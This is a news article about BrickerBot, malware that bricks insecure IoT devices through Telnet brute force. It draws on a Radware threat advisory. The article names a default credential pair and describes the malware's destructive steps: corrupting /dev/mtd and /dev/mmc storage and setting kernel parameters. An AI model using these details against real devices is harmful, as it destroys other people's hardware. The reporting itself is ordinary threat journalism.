BrickerBot targets insecure IoT devices - and then bricks them
'Grey hat' hacker suspected to be behind malware that seeks out and takes down insecure connected devices
BrickerBot, a new form of "permanent denial-of-service" (PDoS), has been spotted in the wild in two separate attacks aimed at the same insecure Internet of Things (IoT) that were targeted by Mirai.
But while Mirai sought to harness the devices to a massive distributed denial-of-service (DDoS) network, BrickerBot (as the name suggests) is designed to render them useless.
The malware has been detected on honeypot servers maintained by DDoS protection company Radware.
"Over a four-day period, Radware's honeypot recorded 1,895 PDoS attempts performed from several locations around the world. Its sole purpose was to compromise IoT devices and corrupt their storage," warned the company in a Threat Advisory.
The company claims to have picked up two distinct, different waves of what it has called BrickerBot from different bot-nets. The second, it claims, was concealed by Tor egress nodes.
"The Bricker Bot PDoS attack used Telnet brute force - the same exploit vector used by Mirai - to breach a victim's devices. Bricker does not try to download a binary, so Radware does not have a complete list of credentials that were used for the brute force attempt, but were able to record that the first attempted username/password pair was consistently 'root'/'vizxv'," warned the company.
IoT devices with hard-wired credentials - there are some - could therefore quickly be rendered useless by such an attack.
"Upon successful access to the device, the PDoS bot performed a series of Linux commands that would ultimately lead to corrupted storage, followed by commands to disrupt Internet connectivity, device performance, and the wiping of all files on the deviceā¦
"Among the special devices targeted are /dev/mtd (Memory Technology Device - a special device type to match flash characteristics) and /dev/mmc (MultiMediaCard - a special device type that matches memory card standard, a solid-state storage medium).
"The sysctl commands attempt to reconfigure kernel parameters: net.ipv4.tcp_timestamps=0 disables TCP timestamps, which does not affect local LAN IPv4 connectivity, but seriously impacts the internet communication, and kernel.threads-max=1 limits the max number of kernel threads to one."
The researchers suggest that the version of BrickerBot they have picked up is targeted at Linux/BusyBox IoT devices that have their Telnet ports open and publicly exposed to the internet - the same as the devices targeted by Mirai.
The authors of BrickerBot, and the people behind the wave of attacks picked up by Radware, are currently unknown. It may be malicious in intent, but equally it could be intended to take known vulnerable devices offline so that they pose no threat in future.
Join Computing in London on 4 May for the Cyber Security Strategy Briefing 2017 for the Financial Sector.
Speakers include Adam Koleda, IT director of insurance firm BPL Global; Peter Agathangelou, associate director of Hamilton Fraser Insurance; and, Dr Kuan Hon, consultant lawyer at law firm Pinsent Masons.
Attendance is free to qualifying IT professionals and IT leaders - register now!